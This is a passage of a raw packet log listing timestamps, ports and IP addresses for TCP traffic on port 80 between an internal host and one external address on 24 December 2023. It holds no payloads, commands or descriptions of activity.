Dec 24, 2023 10:44:28.750760078 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.750802040 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.750816107 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.750858068 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.750881910 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.750925064 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.750942945 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.750957012 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.750977993 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.750993967 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.751018047 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.751055956 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.751138926 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.751176119 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.751207113 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.751247883 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.751307011 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.751344919 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.751374006 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.751413107 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.751431942 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.751470089 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.751487970 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.751524925 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.751544952 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.751585960 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.751599073 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.751625061 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.751636028 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.751667976 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.751718998 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.751773119 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.751790047 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.751816988 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.751826048 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.751852036 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.751871109 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.751912117 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.751929998 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.751964092 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.751972914 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.752000093 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.752021074 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.752074003 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.752084017 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.752123117 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.752141953 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.752178907 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.752207994 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.752244949 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.752274990 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.752312899 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.752373934 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.752414942 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.752434969 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.752475023 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.752492905 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.752541065 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.752554893 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.752597094 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.752614975 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.752654076 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.752671957 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.752727032 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.752743959 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.752782106 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.752810001 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.752845049 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.752855062 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.752892017 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.752908945 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.752945900 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.752965927 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.753006935 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.753036976 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.753074884 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.753135920 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.753185987 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.753201008 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.753228903 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.753242016 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.753263950 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.753278017 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.753314972 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.753345013 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.753385067 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.753401995 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.753442049 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.753459930 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.753495932 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.753516912 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.753556013 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.753573895 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.753612995 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.753631115 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.753676891 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.753689051 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.753712893 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.753726006 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.753761053 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.753777027 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.753817081 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.753834009 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.753873110 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.753890991 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.753926992 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.754049063 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.754085064 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.754107952 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.754143953 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.754173994 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.754219055 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.754232883 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.754268885 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.754287958 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.754323959 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.754447937 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.754487991 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.754508018 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.754548073 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.754564047 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.754602909 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.754620075 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.754659891 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.754678011 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.754709005 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.754724026 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.754761934 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.754779100 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.754832029 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.754849911 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.754887104 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.754986048 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.755023003 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.755053997 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.755094051 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.755122900 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.755160093 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.755244017 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.755281925 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.755302906 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.755340099 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.755450010 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.755486012 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.755502939 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.755543947 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.755563021 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.755599976 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.755625010 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.755637884 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.755659103 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.755675077 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.755697012 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.755733967 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.755809069 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.755846024 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.755875111 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.755913019 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.755942106 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.755954981 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.755978107 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.756006002 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.756059885 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.756102085 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.756119967 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.756134033 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.756156921 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.756174088 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.756200075 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.756249905 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.756268024 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.756306887 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.756325006 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.756349087 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.756359100 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.756383896 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.756412029 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.756449938 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.756468058 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.756504059 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.756534100 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.756571054 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.756599903 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.756644011 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.756661892 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.756699085 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.756772041 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.756808043 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.756825924 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.756870985 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.756889105 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.756932020 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.756947041 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.756999969 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.757064104 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.757100105 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.757121086 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.757162094 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.757179976 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.757217884 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.757236004 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.757282019 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.757299900 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.757338047 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.757358074 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.757395983 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.757414103 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.757451057 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.757481098 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.757519007 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.757571936 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.757603884 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.757618904 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.757646084 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.757653952 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.757678032 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.757726908 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.757747889 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.757762909 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.757776976 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.757814884 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.757858038 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.757873058 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.757913113 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.757930040 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.757942915 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.757978916 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.757992029 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.758116007 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.758156061 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.758174896 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.758213997 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.758230925 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.758269072 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.758286953 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.758325100 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.758393049 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.758430004 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.758462906 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.758498907 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.758544922 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.758586884 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.758634090 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.758646011 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.758671045 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.758685112 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.758712053 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.758748055 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.758816957 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.758852005 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.758882046 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.758904934 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.758914948 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.758938074 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.758991957 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.759013891 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.759022951 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.759068012 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.759084940 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.759129047 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.759145975 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.759171009 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.759179115 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.759202957 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.759219885 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.759254932 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.759331942 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.759381056 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.759398937 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.759435892 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.759552002 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.759596109 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.759623051 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.759643078 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.759656906 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.759712934 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.759727001 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.759752989 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.759763002 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.759779930 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.759788990 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.759814978 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.759840012 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.759880066 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.759949923 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.759988070 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.760016918 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.760059118 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.760076046 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.760126114 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.760135889 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.760173082 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.760261059 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.760298967 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.760318995 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.760355949 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.760385036 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.760406017 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.760422945 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.760438919 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.760481119 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.760519028 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.760536909 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.760579109 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.760601997 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.760639906 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.760749102 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.760787010 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.760804892 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.760819912 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.760834932 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.760853052 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.760880947 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.760924101 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.760942936 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.760986090 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.761003017 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.761042118 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.761060953 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.761101007 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.761117935 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.761132956 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.761152983 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.761178017 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.761195898 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.761236906 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.761254072 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.761267900 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.761287928 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.761303902 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.761327982 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.761373043 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.761389017 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.761426926 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.761452913 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.761482000 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.761493921 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.761531115 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.761550903 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.761586905 CET	49716	80	192.168.2.5	91.215.85.17
